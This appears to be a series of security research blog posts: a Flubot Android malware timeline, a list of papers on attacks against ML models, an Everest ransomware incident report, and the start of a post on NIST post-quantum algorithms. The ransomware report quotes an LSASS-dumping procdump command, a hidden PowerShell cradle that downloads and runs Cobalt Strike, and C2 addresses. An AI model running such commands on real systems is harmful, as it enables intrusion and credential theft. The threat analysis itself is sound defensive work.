In this post we want to share all we know about this threat and a timeline of the most relevant and interesting (new) features and changes that Flubot’s TAs have introduced. We will focus on these features and changes related to the detected samples but also in the different campaigns that TAs have been using to distribute this malware.

The beginning: A new Android Banking Malware targeting Spain [Flubot versions 0.1-3.3]

Based on reports from other researchers, Flubot samples were first found in the wild between November and December of 2020. Public information about this malware was first published on 6 January 2021 by our partner ThreatFabric (https://twitter.com/ThreatFabric/status/1346807891152560131). Even though ThreatFabric was the first to publish public information on this new family and called it “Cabassous”, the research community has been more commonly referring to this malware as Flubot.

In the initial campaigns, Flubot was distributed using Fedex and Correos fake SMS messages. In those messages, the user was led to a fake website which was basically a “landing page” style website to download what was supposed to be an Android application to track the incoming shipping.

In this initial campaign versions prior to Flubot 3.4 were used, and TAs were including support for new campaigns in other countries using specific samples for each country. The reasons why there were different samples for different countries were:
– Domain Generation Algorithm (DGA). It was using a different seed to generate 5.000 different domains per month. Just out of curiosity: For Germany, TAs were using 1945 as seed for the DGA.
– Phone country code used to send more distribution smishing SMS messages from infected devices and block those numbers in order to avoid communication among victims.

There were no significant changes related to features in the initial versions (from 0.1 to 3.3). TAs were mostly focused on the distribution campaigns, trying to infect as many devices as possible.

There is one important change in the initial versions, but it is difficult to find the exact version in which this change was first introduced because there are some version without samples on public repositories. TAs introduced web injections to steal credentials, the most popular tactic to steal credentials on Android devices. This was introduced starting between versions 0.1 and 0.5, in December 2020.

In those initial versions, TAs increased the version number of the malware in just a few days without adding significant changes. Most of the samples – particularly previous to 2.1 – were not uploaded to public malware repositories, making it even harder to track the first versions of Flubot.

On these initial versions (after 0.5), TAs also introduced other not so popular features like the “USSD” one which was used to call to special numbers to earn money (“RUN_USSD” command), it was introduced at some point between versions 1.2 and 1.7. In fact, it seems this feature wasn’t really used by Flubot’s TAs. Most used features were the web injections to steal banking and cryptocurrency platform credentials and sending SMS features to distribute and infect new devices.

From version 2.1 to 2.8 we observed TAs started to use a different packer for the actual Flubot’s payload. It could explain why we weren’t able to find samples on public repositories between 2.1 and 2.8, probably there were some “internal” versions
used to try different packers and/or make it work with the new one.

March 2021: New countries and improvements on distribution campaigns [Flubot versions 3.4-3.7]

After a few months apparently focused on distribution campaigns and not really on new features for the malware itself, we have found version 3.4 in which TAs introduced some changes on the DGA code. In this version, they reduced the number of generated domains from 5.000 to 2.500 a month. At first sight this looks like a minor change, but is one of the first changes to start distributing the malware in different countries in a more easy way for TAs, since a different sample with different parameters was used for each country.

In fact, we can see a new version (3.6) customized for targeting victims in Germany in March 18, 2021. Only five days later, another version was released (3.7), with interesting changes. TAs were trying to use the same sample for campaigns in Spain and Germany, including Spanish and German phone country codes split by newline character to block the phone number to which the infected device is sending smishing messages.

At the same time, TAs introduced a new campaign on Hungary. By the end of March, TAs introduced a new change on version 3.7: an important change in their DGA, since they replaced “.com” TLD with “.su”. This change was important for tracking Flubot, since now TAs could use this new TLD to register new C2’s domains.

April 2021: DoH and unique samples for all campaigns [Flubot versions 3.9-4.0]

It seems TAs were working since late March on a new version: Flubot 3.9. In this new version, they introduced DNS-over-HTTPs (DoH). This new feature was used to resolve domain names generated by the DGA. This way, it was more difficult to detect infected devices in the network, since security solutions were not able to check
which domains were being resolved.

In the following images we show decompiled code of this new version, including the new DoH code. TAs kept the old classic DNS resolving code. TAs introduced code to randomly choose if DoH or classic DNS should be used.

The introduction of DoH was not the only feature that was added to Flubot 3.9. TAs also added some UI messages to prepare future campaigns targeting Italy.
Those messages were used a few days later in the new Flubot 4.0 version, in which TAs finally started to use one single sample for all of the campaigns – no more unique samples to targeted different countries.

With this new version, the targeted country’s parameters used on previous version of Flubot were chosen depending on the victim’s device language. This way, if the device language was Spanish, then Spanish parameters were used. The following parameters were chosen:
– DGA seed
– Phone country codes used for smishing and phone number blocking

May 2021: Time for infrastructure and C2 server improvements [Flubot versions 4.1-4.3]

May starts with a minor update on version 4.0 – a change the DoH servers used to resolve DGA domains. Now instead of using CloudFlare’s servers they started using Google’s servers. This was the first step to move to a new version, Flubot 4.1.

In this new version, TAs have changed one more time the DoH servers used to resolve the C2 domains. In this case, they introduced three different services or DNS servers: Google, CloudFlare and AliDNS. The last one was used for the first time in the life of Flubot to resolve the DGA domains.

Those three different DoH services or servers were chosen randomly to resolve the generated domains, to finally make the requests to any of the active C2 servers.
These changes also brought a new campaign in Belgium, in which TAs used fake BPost app and smishing messages to lure new victims. One week later, new campaigns in Turkey were also introduced, this time in a new Flubot version with important changes related to its C2 protocol.

The first samples of Flubot 4.2 appeared on 17 May 2021 with a few important changes in the code used to communicate with the C2 servers. In this version, the malware was sending HTTP requests with a new path in the C2: “p.php”, instead of the classic “poll.php” path.

At first sight it seemed like a minor change, but paying attention to the code we realized there was an important reason behind this change: TAs changed the encryption method used for the protocol to communicate with the C2 servers.

Previous versions of Flubot were using simple XOR encryption to encrypt the information exchanged with the C2 servers, but this new version 4.2 was using
RC4 encryption to encrypt that information instead of the classic XOR. This way, the C2 server still supported old versions and new version at the same time:

  • poll.php and poll2.php were used to send/receive requests using the old XOR encryption
  • p.php was used to send and receive requests using the new RC4 encryption

Besides the new protocol encryption on version 4.2, TAs also added at the end of May support for new campaigns in Romania.

Finally, on 28 May 2021 new samples of Flubot 4.3 were discovered with minor changes, mainly focused on the strings obfuscation implemented by the malware.

June 2021: VoiceMail. New campaign new countries [Flubot versions 4.4-4.6]

A few days after first samples of Flubot 4.3 were discovered – on May 31, 2021 and June 1, 2021 – new samples of Flubot were observed with version number bumped to 4.4.
One more time, no major changes in this new version. TAs added support for campaigns in Portugal. As we can see with versions 4.3 and 4.4, it was common for Flubot’s TAs to bump the version number in just a few days, with just minor changes. Some versions were not even found in public repositories (e.g. version 3.3), which suggests that some versions were never used in public or just skipped and TAs just bumped the version. Maybe those “lost versions” lasted just a few hours in the distribution servers and were quickly updated to fix bugs.

In the month of June the TAs hardly made any changes related to features, but instead they were working on new distribution campaigns.

On version 4.5, TAs added Slovakia, Czech Republic, Greece and Bulgaria to the list of supported countries for future campaigns. TAs reused the same DGA seed for all of them, so it didn’t require too much work from their part to get this version released.

A few days after version 4.5 was observed, a new version 4.6 was discovered with new countries added for future campaigns: Austria and Switzerland. Also, some countries that were removed in previous versions were reintroduced: Sweden, Poland, Hungary, and The Netherlands.

This new version of Flubot didn’t come only with more country coverage. TAs introduced a new distribution campaign lure: VoiceMail. In this new “VoiceMail” campaign, infected devices were used to send text messages to new potential victims using messages in which the user was lead to a fake website. This time a “VoiceMail” app was installed, which should allow the user to listen to the received Voice mail messages. In the following image we can see the VoiceMail campaign for Spanish users.

July 2021: TAs Holidays [Flubot versions 4.7]

July 2021 is the month with less activity. In this month, only one version update was observed at the very beginning of the month – Flubot 4.7. This new version came without the usage of different DGA seeds by country or device language. TAs started to randomly choose the seed from a list of seeds, which were the same seeds that were previously used for country or device language.

Besides the changes related to the DGA seeds, TAs also introduced support for campaigns in new countries: Serbia, Croatia and Bosnia and Herzegovina.

There was almost no Flubot activity in summer. Our assumption is the developers were busy with their summer holidays. As we will see in the following section, TAs will recover their activity in August and October.

August-September 2021: Slow come back from Holidays [Flubot versions 4.7-4.9]

During the first days of August, after TAs possibly enjoyed a nice holiday season, Australia was added to version 4.7 in order to start distribution campaigns in that country. Only a week later, TAs released the new version 4.8, in which we found some minor changes mostly related to UI messages and alert dialogs.

One more version bump for Flubot was discovered on September, when version 4.9 came out with some more minor changes, just like the previous version 4.8. This time, new web injections were introduced in the C2 servers to steal credentials from victims. Those two new versions with minor changes (not very relevant) seems like a relaxed come back to activity. From our point of view, the most interesting thing that happened in those two months is that TAs started to distribute another malware family using the Flubot botnet. We received from C2 servers a few smishing tasks in which the fake “VoiceMail” website was serving Teabot (also known as Anatsa and Toddler) instead of Flubot.

That was very interesting because it showed that Flubot’s TAs could be also associated with this malware family or at least could be interested on selling the botnet for smishing purposes to other malware developers. As we will see, that was not the only family distributed by Flubot.

October-November 2021: ‘Android Security Update’ campaign and new big protocol changes [Flubot versions 4.9]

During October and most part of November, Flubot’s TAs didn’t bump the version number of the malware and they didn’t do very important moves during that period of time.

At the beginning of October, we saw a campaign different from the previous DHL / Correos / Fedex campaigns or the “VoiceMail” campaign. This time, TAs started to distribute Flubot as a fake security update for Android. It seems this new distribution campaign wasn’t working as expected, since TAs kept using the “VoiceMail” distribution campaign after a few days.

TAs were very quiet until late November, when they finally released new samples with important changes in the protocol used to communicate with C2 servers. After bumping the version numbers so quickly at the beginning, now TAs weren’t bumping the version number
even with a major change like this one.

This protocol change allowed the malware to communicate with the C2 servers without starting a direct connection with them. Flubot used TXT DNS requests to common public DNS servers (Google, CloudFlare and AliDNS). Then, those requests were forwarded to the actual C2 servers (which implemented DNS servers) to get the TXT record response from the servers and forward it to the malware. The stolen information from the infected device was sent encrypting it using RC4 (in a very similar way to the used in the previous protocol version) and encoding the encrypted bytes. This way, the encoded payload was used as a subdomain of the DGA generated domain. The response from C2 servers was also encrypted and encoded as the TXT record response to the TXT request, and it included the commands to execute smishing tasks for distribution campaign or the web injections used to steal credentials.

With this new protocol, Flubot was using DoH servers from well known companies such as Google and CloudFlare to establish a tunnel of sorts with the C2 servers. With this technique, detecting the malware via network traffic monitoring was very difficult, since the malware wasn’t establishing connections with unknown or malicious servers directly. Also, since it was using DoH, all the DNS requests were encrypted, so network traffic monitoring couldn’t identify those malicious DNS requests.

This major change in the protocol with the C2 servers could also explain the low activity in the previous months. Possibly developers were working on ways to improve the protocol as well as the code of both malware and C2 servers backend.

December 2021: ‘Flash Player’ campaign and DGA changes [Flubot versions 5.0-5.1]

Finally, in December the TAs decided to finally bump the version number to 5.0. This new version brought a minor but interesting change: Flubot can now receive URLs in addition to web injections HTML and JavaScript code. Before version 5.0, C2 servers would send the web injection code, which was saved on the device for future use when the victim opened one of the targeted applications in order to steal the credentials. Since version 5.0, C2 servers were sending URLs instead, so Flubot’s malware had to visit the URL and save the HTML and JavaScript source code in memory for future use.

No more new versions or changes were observed until the end of December, when the TAs wanted to say goodbye to the 2021 by releasing Flubot 5.1. The first samples of Flubot 5.1 were detected on December 31. As we will see in the following section, on January 2 Flubot 5.2 samples came out. Version 5.1 came out with some important changes on DGA. This time, TAs introduced a big list of TLDs to generate new domains, while they also introduced a new command used to receive a new DGA seed from the C2 servers – UPDATE_ALT_SEED. Based on our research, this new command was never used, since all the newly infected devices had to connect to the C2 servers using the domains generated with the hard-coded seeds.

Besides the new changes and features added in December, TAs also introduced a new campaign: “Flash Player”. This campaign was used alongside with “VoiceMail” campaign, which still was the most used to distribute Flubot. In this new campaign, a text message was sent to the victims from infected devices trying to make them install a “Flash Player” application in order to watch a fake video in which the victim appeared. The following image shows how simple the distribution website was, shown when the victim opens the link.

January 2022: Improvements in Smishing features and new ‘Direct Reply’ features [Flubot versions 5.2-5.4]

At the very beginning of January new samples for the new version of Flubot were detected. This time, version 5.2 introduced minor changes in which TAs added support for longer text messages on smishing tasks. They stopped using the usual Android’s “sendTextMessage” function and started to use “sendMultipartTextMessage” alongside “divideMessage” instead. This allowed them to use longer messages, split into multiple messages.

A few days after new sample of version 5.2 was discovered, samples of version 5.3 were detected. In this case, no new features were introduced. TAs removed some unused old code. This version seemed like a version used to clean the code. Also, three days after the first samples of Flubot 5.3 appeared, new samples of this version were detected with support for campaigns in new countries: Japan, Hong Kong, South Korea, Singapore and Thailand.

By the end of January, TAs released a new version: Flubot 5.4. This new version introduced a new and interesting feature: Direct Reply. The malware was now capable to intercept the notifications received in the infected device and automatically reply them with a configured message received from the C2 servers.

To get the message that would be used to reply notifications, Flubot 5.4 introduces a new request command called “GET_NOTIF_MSG”. As the following image shows, this request command is used to get the message to finally be used when a new notification is received.

Even though this was an interesting new feature to improve the botnet’s distribution power, it didn’t last too long. It was removed in the following version.

In the same month we detected Medusa, another Android banking malware, distributed in some Flubot smishing tasks. This means that, one more time, Flubot botnet was being used as a distribution botnet for distribution of another malware family. In August 2021 it was used to distribute Teabot. Now, it has been used to distribute Medusa.

If we try to connect the dots, it could explain the new “Direct Reply” feature and the usage of “multipart messages”. Those improvements could have been introduced due to suggestions made by Medusa’s TAs in order to use Flubot botnet as distribution service.

February-March-April 2022: New cookie stealing features [Flubot versions 5.5]

From late January – when we fist observed version 5.4 in the wild – to late February, almost one month passed until a new version was released. We believe this case is similar to previous periods of time, like August-November 2021, when TAs used that time to introduce a big change in the protocol. This time, it seems TAs were quietly working on new Flubot 5.5, which came with a very interesting feature: Cookie stealing.

The first thing we realized by looking at the new code was a little change when requesting the list of targeted apps. This request must include the list of installed applications in the infected device. As a result, the C2 server would provide the subset of apps which are targeted. In this new version, “.new” was appended to the package names of installed apps when doing the “GET_INJECTS_LIST” request.

At the beginning, the C2 servers were responding with URLs to fetch the web injections for credentials stealing when using “.new” appended to the package’s name. After some time, C2 servers started to respond with the official URL of the banks and crypto-currency platforms, which seemed strange. After analysis of the code, we realized they also introduced code to steal the cookies from the WebView used to show web injections – in this case, the targeted entity’s website. Clicks and text changes in the different UI elements of the website were also logged and sent to the C2 server, so TAs were not only stealing cookies: they were also able to steal credentials via “keylogging”.

The cookies stealing code could receive an URL, the same way it could receive a URL to fetch web injections, but this time visiting the URL it wasn’t receiving the web injection. Instead, it was receiving a new URL (the official bank or service URL) to be loaded and to steal the credentials from. In the following image, the response from a compromised website used to download the web injections is shown. In this case, it was used to get the payload for stealing GMail’s cookies (shown when the victim tries to open Android Email application).

After the victim logs in to the legitimate website, Flubot will receive and handle an event when the website ends loading. At this time, it gets the cookies and sends them to the C2 server, as can be seen in the following image.

May 2022: MMS smishing and.. The End? [Flubot versions 5.6]

Once again, after one month without new versions in the wild, a new version of Flubot came out at the beginning of May: Flubot 5.6. This is the last known Flubot version.

This new version came with a new interesting feature: MMS smishing tasks. With this new feature, TAs were trying to bypass carriers detections, which were probably put in place after more than a year of activity. A lot of users were infected and their devices where sending text messages without their knowledge.

To introduce this new feature, TAs added new request’s commands:
– GET_MMS: used to get the phone number and the text message to send (similar to the usual GET_SMS used before for smishing)
– MMS_RATE: used to get the time rate to make “GET_MMS” request and send the message (similar to the usual SMS_RATE used before for smishing).

After this version got released on May 1st, the C2 servers stopped working on May 21st. They were offline until May 25th, but they were still not working properly, since they were replying with empty responses. Finally, on June 1st, Europol published on their website that they took down the Flubot’s infrastructure with the cooperation of police from different countries. Dutch Police was the one that took down the infrastructure. It probably happened because Flubot C2 servers, at some point in 2022, changed the hosting services to a hosting service in The Netherlands, making it easier to take down.

Does it mean this is the end of Flubot? Well, we can’t know for sure, but it seems police wasn’t able to get the RSA private keys since they didn’t make the C2 servers send commands to detect and remove the malware from the devices.

This means that the TAs should be able to bring Flubot back by just registering new domains and setting up all the infrastructure in a “safer” country and hosting service. TAs could recover their botnet, with less infected devices due to the offline time, but still with some devices to continue sending smishing messages to infect new devices. It depends on the TAs intentions, since it seems that the police hasn’t found them yet.

Conclusion

Flubot has been one of the most – if not the most – active banking malware family of the last few years. Probably this was due to their powerful distribution strategy: smishing. This malware has been using the infected devices to send text messages to the phone numbers which were stolen from the victims smartphones. But this, in combination with fake parcel shipping messages in a period of time in which everybody is used to buy things online has made it an important threat.

As we have seen in this post, TAs have introduced new features very frequently, which made Flubot even more dangerous and contagious. A significant part of the updates and new features have been introduced to improve the distribution capabilities of the malware in different countries, while others have been introduced to improve the credentials and information stealing capabilities.

Some updates delivered major changes in the protocol, making it more difficult to detect via network monitoring, with a DoH tunnel-based protocol which is really uncommon in the world of Android Malware. It seems that TAs have even been interested on selling some kind of “smishing distribution” service to other TAs, as we have seen with the association with Teabot and Medusa.

After one year and a half, Dutch Police was able to take down the C2 servers after TAs started using a Dutch hosting service. It seems to be the end of Flubot, at least for now.

TAs still can move the infrastructure back to a “safer” hosting and register new DGA domains to recover their botnet. It’s too soon to determine that was the end of Flubot. Time will tell what will happen with this Android malware family, which has been one of the most important and interesting malware families in the last few years.

List of samples by version

0.1 – 5e0311fb1d8dda6b5da28fa3348f108ffa403f3a3cf5a28fc38b12f3cab680a0
0.5 – d3af7d46d491ae625f66451258def5548ee2232d116f77757434dd41f28bac69
1.2 – c322a23ff73d843a725174ad064c53c6d053b6788c8f441bbd42033f8bb9290c
1.7 – 75c2d4abecf1cc95ca8aeb820e65da7a286c8ed9423630498a95137d875dfd28
1.9 – 9420060391323c49217ce5d40c23d3b6de08e277bcf7980afd1ee3ce17733da2
2.1 – 13013d2f96c10b83d79c5b4ecb433e09dbb4f429f6d868d448a257175802f0e9
2.2 – 318e4d4421ce1470da7a23ece3db5e6e4fe9532e07751fc20b1e35d7d7a88ec7
2.8 – f3257b1f0b2ed1d67dfa1e364c4adc488b026ca61c9d9e0530510d73bd1cf77e
3.1 – affaf5f9ba5ea974c605f09a0dd7776d549e5fec2f946057000abe9aae1b3ce1
3.2 – 865aaf13902b312a18abc035f876ad3dfedce5750dba1f2cc72aabd68d6d1c8f
3.4 – ca18a3331632440e9b86ea06513923b48c3d96bc083310229b8c5a0b96e03421
3.5 – 43a2052b87100cf04e67c3c8c400fa203e0e8f08381929c935cff2d1f80f0729
3.6 – fd5f7648d03eec06c447c1c562486df10520b93ad7c9b82fb02bd24b6e1ec98a
3.7 – 1adba4f7a2c9379a653897486e52123d7c83807e0e7e987935441a19eac4ce2c
3.9 – 1cf5c409811bafdc4055435a4a36a6927d0ae0370d5197fcd951b6f347a14326
4.0 – 8e2bd71e4783c80a523317afb02d26cac808179c57834c5c599d976755b1dabd
4.1 – ec3c35f17e539fe617ca2e73da4a51dc8efedda94fd1f8b50a5b77d63e58ba5c
4.2 – 368cebac47e36c81fb2f1d8292c6c89ccb10e3203c5927673ce05ba29562f19c
4.3 – dab4ce5fbb1721f24bbb9909bb59dcc33432ccf259ee2d3a1285f47af478416d
4.4 – 6a03efa4ffa38032edfb5b604672e8c9e01a324f8857b5848e8160593dfb325e
4.5 – f899993c6109753d734b4faaf78630dc95de7ea3db78efa878da7fbfc4aee7cd
4.6 – ffaebdbc8c2ecd63f9b97781bb16edc62b2e91b5c69e56e675f6fbba2d792924
4.7 – a0dd408a893f4bc175f442b9050d2c328a46ff72963e007266d10d26a204f5af
4.8 – a0181864eed9294cac0d278fa0eadabe68b3adb333eeb2e26cc082836f82489d
4.9 – 831334e1e49ec7a25375562688543ee75b2b3cc7352afc019856342def52476b
4.9 – 8c9d7345935d46c1602936934b600bb55fa6127cbdefd343ad5ebf03114dbe45 (DoH tunnel protocol)
5.0 – 08d8dd235769dc19fb062299d749e4a91b19ef5ec532b3ce5d2d3edcc7667799
5.1 – ff2d59e8a0f9999738c83925548817634f8ac49ec8febb20cfd9e4ce0bf8a1e3
5.2 – 4859ab9cd5efbe0d4f63799126110d744a42eff057fa22ff1bd11cb59b49608c
5.3 – e9ff37663a8c6b4cf824fa65a018c739a0a640a2b394954a25686927f69a0dd4
5.4 – df98a8b9f15f4c70505d7c8e0c74b12ea708c084fbbffd5c38424481ae37976f
5.5 – 78d6dc4d6388e1a92a5543b80c038ac66430c7cab3b877eeb0a834bce5cb7c25
5.6 – 16427dc764ddd03c890ccafa61121597ef663cba3e3a58fc6904daf644467a7c

Whitepaper – Practical Attacks on Machine Learning Systems

6 July 2022 at 18:36

Written by Chris Anley, Chief Scientist, NCC Group

This paper collects a set of notes and research projects conducted by NCC Group on the topic of the security of Machine Learning (ML) systems. The objective is to provide some industry perspective to the academic community, while collating helpful references for security practitioners, to enable more effective security auditing and security-focused code review of ML systems. Details of specific practical attacks and common security problems are described. Some general background information on the broader subject of ML is also included, mostly for context, to ensure that explanations of attack scenarios are clear, and some notes on frameworks and development processes are provided.

This paper may be downloaded below:

Five Essential Machine Learning Security Papers

7 July 2022 at 17:17

We recently published “Practical Attacks on Machine Learning Systems”, which has a very large references section – possibly too large – so we’ve boiled down the list to five papers that are absolutely essential in this area. If you’re beginning your journey in ML security, and have the very basics down, these papers are a great next step.

We’ve chosen papers that explain landmark techniques but also describe the broader security problem, discuss countermeasures and provide comprehensive and useful references themselves.

  1. Stealing Machine Learning Models via Prediction APIs, 2016, by Florian Tramer, Fan Zhang, Ari Juels, Michael K. Reiter and Thomas Ristenpart

https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_tramer.pdf

ML models can be expensive to train, may be trained on sensitive data, and represent valuable intellectual property, yet they can be stolen – surprisingly efficiently – by querying them.

From the paper: “We demonstrate successful model extraction attacks against a wide variety of ML model types, including decision trees, logistic regressions, SVMs, and deep neural networks, and against production ML-as-a-service (MLaaS) providers, including Amazon and BigML.1 In nearly all cases, our attacks yield models that are functionally very close to the target. In some cases, our attacks extract the exact parameters of the target (e.g., the coefficients of a linear classifier or the paths of a decision tree).”

  1. Extracting Training Data from Large Language Models, 2020, by Nicholas Carlini, Florian Tramer, Eric Wallace, et. al.

https://arxiv.org/abs/2012.07805

Language models are often trained on sensitive datasets; transcripts of telephone conversations, personal emails and messages… since ML models tend to perform better when trained on more data, the amount of sensitive information involved can be very large indeed. This paper describes a relatively simple attack technique to extract verbatim training samples from large language models.

From the paper: “We demonstrate our attack on GPT-2, a language model trained on scrapes of the public Internet, and are able to extract hundreds of verbatim text sequences from the model’s training data. These extracted examples include (public) personally identifiable information (names, phone numbers, and email addresses), IRC conversations, code, and 128 bit UUIDs. Our attack is possible even though each of the above sequences are included in just one document in the training data.”

  1. Model inversion attacks that exploit confidence information and basic countermeasures, 2015, by Matt Fredrikson, Somesh Jha and Thomas Ristenpart

https://rist.tech.cornell.edu/papers/mi-ccs.pdf

Model Inversion attacks enable the attacker to generate samples that accurately represent each of the classes in a training dataset, for example, an image of a person in a facial recognition system or a picture of a signature.

From the paper: “We experimentally show attacks that are able to estimate whether a respondent in a lifestyle survey admitted to cheating on their significant other and, in the other context, show how to recover recognizable images of people’s faces given only their name and access to the ML model.”

  1. Targeted Backdoor Attacks on Deep Learning Systems Using Data Poisoning, 2017, by Xinyun Chen, Chang Liu, Bo Li, Kimberly Lu, and Dawn Song

https://arxiv.org/abs/1712.05526

Obtaining training data is a major problem in Machine Learning, and it’s common for training data to be drawn from multiple sources; user-generated content, open datasets and datasets shared by third parties. This attack applies to a scenario where an attacker is able to supplement the training set of a model with a small amount of data of their own, resulting in a model with a “backdoor” – a hidden, yet specifically targeted behaviour that will change the output of the model when presented with some specific type of input.

From the paper: “The face recognition system is poisoned to have backdoor with a physical key, i.e., a pair of commodity reading glasses. Different people wearing the glasses in front of the camera from different angles can trigger the backdoor to be recognized as the target label, but wearing a different pair of glasses will not trigger the backdoor.”

  1. Explaining and harnessing adversarial examples, 2014, by Ian J. Goodfellow, Jonathon Shlens, and Christian Szegedy

https://arxiv.org/abs/1412.6572

Neural networks classifiers are surprisingly “brittle”; a small change to an input can cause a surprisingly large change in the output classification. Classifiers are now a matter of life and death; the difference between a “STOP” sign and a “45 MPH” sign, a gun and a pen, or the classification of a medical scan are extremely important decisions that are increasingly automated by these systems, so this odd behaviour is an extremely important security problem.

This paper is an exploration of the phenomenon, with several suggested explanations, discussion around generation of adversarial examples, and defences.

The paper also poses several interesting questions. From the paper: “An intriguing aspect of adversarial examples is that an example generated for one model is often misclassified by other models, even when they have different architecures or were trained on disjoint training sets. Moreover, when these different models misclassify an adversarial example, they often agree with each other on its class.”

Climbing Mount Everest: Black-Byte Bytes Back?

Authored by: Michael Mullen and Nikolaos Pantazopoulos

Summary

tl;dr

In the Threat Pulse released in November 2021 we touched on Everest Ransomware group. This latest blog documents the TTPs employed by a group who were observed deploying Everest ransomware during a recent incident response engagement.

In summary, we identified the following key TTPs:

  • Lateral Movement through Remote Desktop Protocol (RDP)
  • Gathering of internal IP addresses for hosts on the network
  • Local LSASS dumps
  • NTDS.dit dumps
  • Installation of Remote Access Tools for persistence

Everest Ransomware

Earlier reports [1] have linked Everest ransomware as part of the Everbe 2.0 family, which is composed of Embrace, PainLocker, EvilLocker and Hyena Locker ransomware. However, after recovering and analysing an Everest ransomware file, we assess with medium confidence that Everest ransomware is related to Black-Byte.

Everest TTPs

Lateral Movement

The threat actor was observed using legitimate compromised user accounts and Remote Desktop Protocol (RDP) for lateral movement.

Credential Access

ProcDump was used to create a copy of the LSASS process in order to access additional credentials. The following command was observed being executed:

C:\Users\<Compromised User>\Desktop\procdump64.exe -ma lsass.exe C:\Users\<Compromised User>\Desktop\lsass<victim’s domain name>.dmp, for example lsasscontoso.dmp.

A copy of the NTDS database was also created with a file name of ntds.dit.zip.

Defence Evasion

Throughout the incident the threat actor routinely removed tooling, reconnaissance output files and data collection archives from hosts.

Discovery

Network discovery was observed upon the compromise of a new host. This activity was primarily conducted via the use of netscan.exe, netscanpack.exe and SoftPerfectNetworkScannerPortable.exe. These tools allow network scans to identify further hosts of interest as well as building a target list for ransomware deployment.   

The output of these tools were saved as text files in the C:\Users\Public\Downloads\ directory. Examples of these have been included below:

  • C:\Users\Public\Downloads\subnets.txt
  • C:\Users\Public\Downloads\trustdumps.txt

Collection

The threat actor installed the WinRAR application on a file server which was then used to archive data ready for exfiltration.

Command and Control

Cobalt Strike was the primary command and control mechanism used by the threat actor. This was executed on hosts using the following command:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(<IP Address>/a'))

Additionally, a Metasploit payload was identified within the path C:\Users\Public\l.exe.

The following Remote Access Tools were also deployed by the threat actor as a secondary command and control method, in addition to added persistence with the tools being installed as a service

  • AnyDesk
  • Splashtop Remote Desktop
  • Atera

Exfiltration

The threat actor utilised the file transfer capabilities of Splashtop to exfiltrate data out of the network.

Impact

Everest’s action on objectives appears to focus on data exfiltration of sensitive information as well as encryption, commonly referred to as double extortion.

Indicators of Compromise

IOC (indicators of compromise) Value Indicator Type Description
netscan.exe File name SoftPerfect Network Scanner
netscanpack.exe File name This was unable to be analysed during the investigation.
svcdsl.exe File name SoftPerfect Network Scanner Portable
Winrar.exe File name Popular archiving tool, which supportsencryption.
subnets.txt File name Network Discovery output file
trustdumps.txt File name Network Discovery output file
l.exe File name Metasploit payload
hxxp://3.22.79[.]23:8080/ URL Site hosting Cobalt Strike beacon
hxxp://3.22.79[.]23:8080/a URL Site hosting Cobalt Strike beacon
hxxp://3.22.79[.]23:10443/ga.js URL Cobalt Strike C2
hxxp://18.193.71[.]144:10443/match URL Cobalt Strike C2
hxxp://45.84.0[.]164:10443/o6mJ URL Meterpreter C2

Attribution

The recovered ransomware binary is attributed to (based on the ransomware note) the ‘Everest group’. However, after analysing it, we identified/attributed the sample to Black-Byte (C# variant instead of Go). It should be noted that the sample’s compilation timestamp does match the incident’s timeline.

Even though the sample’s functionality remains the same, we noticed that it does not download the key from a server anymore. Instead, it is (randomly) generated on the compromised host. In addition, the ransomware’s onion link is different.

Based on our findings, we cannot confirm if a different threat actor copied the source code of Black-Byte and started using it or if the Black-Byte have indeed started using again the C# ransomware variant.

MITRE ATT&CK®

Tactic Technique ID Description
Initial Access External Remote Services T1133 Initial Access was through an insecure external service
Execution Command and Scripting Interpreter: PowerShell T1059.001 Threat actor utilised PowerShell to execute malicious commands
Execution Command and Scripting Interpreter: Windows Command Shell T1059.003 Threat actor utilised Windows Command Shell to execute malicious commands
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 Lateral movement was observed utilising RDP
Persistence Create or Modify System Process: Windows Service T1543.003 Threat actor installed remote desktop software tools as services for persistence
Credential Access OS Credential Dumping: LSASS Memory T1003.001 The tool Procdump was used to create a copy of the LSASS process
Credential Access OS Credential Dumping: NTDS T1003.003 The NTDS.dit was copied
Defence Evasion Indicator Removal on Host: File deletion T1070.004 Threat actor routinely deleted tooling and output
Discovery Network Service Discovery T1046 Threat actor utilised numerous network discovery tools – Netscan and SoftPerfectNetworkScanner
Collection Archive Collected Data: Archive via Utility T1560.001 Threat actor archived data using WinRAR
Command and Control Application Layer Protocol: Web Protocols T1071.001 Cobalt Strike was implemented using HTTPS for C2 traffic
Command and Control Remote Access Software T1219 Threat actor utilised remote access software – Anydesk, Splashtop and Atera
Exfiltration Exfiltration Over C2 Channel T1041 Data exfiltration was conducted using the Splashtop application
Impact Data Encrypted for Impact T1486 Data was encrypted for impact

References

NIST Selects Post-Quantum Algorithms for Standardization

13 July 2022 at 20:04

Last week, NIST announced some algorithms selected for standardization as part of their Post-Quantum Cryptography project. This is a good opportunity to recall the history of this process, observe its current state, and comment on the selected algorithms. It is important to remember that the process is not finished: round 4 has started, and should ultimately produce at least one more selected algorithm.

The PQC project started in late 2016 with a call for submissions. The ostensible motivation was the possible emergence of quantum computers, since such machines would be able to break through existing asymmetric cryptographic algorithms based on number theory and related algebraic objects (RSA, elliptic curves…). Nobody really knows whether quantum computers will exist in the future; they combine impeccable theory with atrociously difficult technology, and are currently devouring huge research budgets while still being quite far from endangering even toy versions of common cryptographic algorithms. There are strong believers and strong disbelievers in practical quantum computing, but belief is not knowledge; however, the mere possibility is enough to warrant taking some precautions, in particular since the design and specification of a good cryptographic algorithm is known to be a lengthy process. Another good reason to investigate new classes of asymmetric algorithms, unrelated to quantum computing, is that we are currently relying on a relatively small set of mathematical “hard problems” that could potentially be weakened through some new insight by a mathematician, and that’s even less predictable than technological advances in trapping single atoms at ultra-low temperatures. Some variety in our algorithms would therefore be highly desirable.

